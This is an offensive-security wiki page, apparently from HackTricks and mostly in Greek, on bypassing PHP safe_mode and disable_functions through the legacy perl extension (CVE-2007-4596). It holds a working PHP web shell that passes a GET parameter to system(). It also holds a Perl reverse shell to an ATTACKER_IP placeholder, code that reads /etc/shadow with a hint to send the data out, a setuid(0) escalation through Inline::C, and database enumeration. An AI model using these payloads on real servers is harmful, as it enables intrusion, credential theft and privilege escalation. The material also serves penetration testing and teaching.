PHP Perl Extension Safe_mode Bypass Exploit

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Υπόβαθρο

Το ζήτημα που καταγράφεται ως CVE-2007-4596 προέρχεται από την παρωχημένη επέκταση PHP perl, η οποία ενσωματώνει έναν πλήρη Perl interpreter χωρίς να σέβεται τους ελέγχους safe_mode, disable_functions ή open_basedir του PHP. Οποιοσδήποτε PHP worker φορτώνει extension=perl.so αποκτά ανεξέλεγκτο Perl eval, οπότε η εκτέλεση εντολών παραμένει απλή ακόμη και όταν όλα τα κλασικά primitives δημιουργίας διεργασιών του PHP έχουν αποκλειστεί. Παρόλο που το safe_mode καταργήθηκε στο PHP 5.4, πολλές ξεπερασμένες shared-hosting στοίβες και ευάλωτα labs εξακολουθούν να το περιλαμβάνουν, επομένως αυτό το bypass παραμένει χρήσιμο όταν βρεθείτε σε legacy control panels.

Δημιουργία Περιβάλλοντος Δοκιμών το 2025

• Το τελευταίο δημόσια διανεμημένο build (perl-1.0.1, January 2013) στοχεύει PHP ≥5.0. Κατεβάστε το από το PECL, μεταγλωττίστε το για την ακριβή κλάδο/έκδοση του PHP που σκοπεύετε να επιτεθείτε, και φορτώστε το παγκοσμίως (php.ini) ή μέσω dl() (αν επιτρέπεται).
• Γρήγορη συνταγή εργαστηρίου βασισμένη σε Debian:

sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2

• Κατά τη διάρκεια της εκμετάλλευσης επιβεβαιώστε τη διαθεσιμότητα με var_dump(extension_loaded('perl')); ή print_r(get_loaded_extensions());. Αν απουσιάζει, αναζητήστε το perl.so ή καταχραστείτε εγγράψιμες εγγραφές php.ini/.user.ini για να το φορτώσετε εξαναγκαστικά.
• Επειδή ο interpreter ζει μέσα στον PHP worker, δεν απαιτούνται εξωτερικά binaries — τα φίλτρα εξερχόμενης κίνησης δικτύου ή οι λίστες αποκλεισμού proc_open δεν έχουν σημασία.

Αρχικό PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, still handy to confirm the extension responds to eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Modern Payload Enhancements

1. Full TTY over TCP

Ο ενσωματωμένος διερμηνέας μπορεί να φορτώσει IO::Socket ακόμη και αν /usr/bin/perl είναι αποκλεισμένο:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Απόδραση από το σύστημα αρχείων ακόμη και με open_basedir

Ο Perl αγνοεί το open_basedir του PHP, οπότε μπορείτε να διαβάσετε αυθαίρετα αρχεία:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Ανακατευθύνετε την έξοδο μέσω του IO::Socket::INET ή του Net::HTTP για να exfiltrate δεδομένα χωρίς να αγγίξετε τους περιγραφείς που διαχειρίζεται το PHP.

3. Inline Compilation for Privilege Escalation

Εάν το Inline::C υπάρχει σε όλο το σύστημα, μεταγλωττίστε βοηθητικά προγράμματα μέσα στο αίτημα χωρίς να βασίζεστε στα ffi ή pcntl του PHP:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Θεώρησε το Perl ως LOLBAS εργαλειοθήκη — π.χ., dump MySQL DSNs ακόμη και αν το mysqli λείπει:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

Αναφορές

• CVE-2007-4596 summary and timeline
• PECL perl extension package information

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.